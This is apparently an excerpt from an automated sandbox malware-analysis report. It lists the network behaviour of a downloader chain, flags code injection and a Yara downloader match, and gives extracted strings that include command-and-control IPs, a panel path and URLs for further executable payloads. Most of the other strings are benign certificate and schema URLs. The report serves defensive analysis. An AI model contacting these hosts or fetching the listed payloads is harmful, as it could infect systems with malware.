                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\AppData\Local
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\Desktop\desktop.ini

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\rundll32.exeNetwork Connect: 193.233.132.167 80
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorIPs: 193.233.132.139
                                Yara detected Generic Downloader
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_0059B670 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,2_2_0059B670
                                Source: b3168c3d9b.exe, 00000004.00000003.2400801702.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2388488630.00000000010AC000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2384397745.00000000010A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
                                Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
                                Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKILUqSjTYt2f71ZJ2P9hYGW4Hp2Xt35GOU6aMhuUUf_toEQ-l9xZdlwBT30N5fFvMwHQuWC2A equals www.youtube.com (Youtube)
                                Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
                                Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQxldTP1ZW9BUsk3Wko45Z7zSTp6uFI2fviAMsMcrMT9TUwJBbIAW49EqVoHmRNuN2WFIdGs&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S33782673%3A1713900850107375&theme=mn&ddm=0 equals www.youtube.com (Youtube)
                                Source: b3168c3d9b.exe, 00000004.00000003.2348077262.0000000003876000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2409233393.000000000389E000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2351504626.0000000003879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
                                Source: b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ_ equals www.youtube.com (Youtube)
                                Source: b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account[Y equals www.youtube.com (Youtube)
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exeHK
                                Source: MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exea
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/0
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/Local
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/a
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/age.Streams.DataWriter
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/erences.SourceAumid
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/f1daa8e86e8e6fbbace30934c49ac47aa495c49#?
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/f1daa8e86e8e8fda7df3081405eac52aa495c49#b
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php001
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php12001
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php1mb3JtLXVybGVuY29kZWQ=
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php6Eo
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpL
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpPE
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpUsers
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpWindows
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpX
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpbE
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpcoded
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpcodedlE
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpcodeduE
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phph
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpop
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmp, explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpu
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe.1
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe1.132f
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exeAK
                                Source: MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exer
                                Source: MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe4
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exepro_botC
                                Source: MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exer
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exetK
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/random.exe
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/sarra.exe
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/sarra.exee
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/mine/amert.exe
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/mine/random.exe
                                Source: svchost.exe, 0000001E.00000003.2923000049.000001EFCE589000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2923073504.000001EFCE573000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2705743746.000001EFCE573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                                Source: svchost.exe, 0000001E.00000003.2502477786.000001EFCECC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2498765635.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                                Source: svchost.exe, 0000001E.00000003.2490135541.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325462458.000001EFCEC8A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2489362309.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                                Source: svchost.exe, 0000001E.00000003.2490135541.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2489362309.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbE%
                                Source: svchost.exe, 0000001E.00000002.3329736359.000001EFCECB8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: svchost.exe, 00000006.00000002.3326223152.000002AF2AC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                Source: svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2491144426.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2488466722.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2703336556.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2703702572.000001EFCE578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2500832032.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2375556720.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA
                                Source: svchost.exe, 0000001E.00000003.2703702572.000001EFCE578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2500832032.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
                                Source: svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2375556720.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                                Source: svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2488466722.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                                Source: svchost.exe, 0000001E.00000002.3360389667.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325172143.000001EFCEC53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                                Source: svchost.exe, 00000006.00000002.3273860235.000002AF25D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2878763604.000002AF2A992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/an2dmhqv5igncgwzelkqyugk5q_2024.4.19.0/go
                                Source: svchost.exe, 00000006.00000003.2089816565.000002AF2A990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: svchost.exe, 0000001E.00000002.3325518723.000001EFCECA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3276271710.000001EFCDC85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                                Source: svchost.exe, 0000001E.00000003.2702970756.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                                Source: svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2473225757.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scdn
                                Source: svchost.exe, 0000001E.00000002.3324680464.000001EFCE582000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                Source: svchost.exe, 0000001E.00000003.2502477786.000001EFCECC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2498765635.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                Source: svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesue
                                Source: svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
                                Source: svchost.exe, 0000001E.00000002.3308028724.000001EFCDCE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                Source: svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustce
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: svchost.exe, 0000001E.00000002.3308028724.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2477482746.000001EFCDD02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
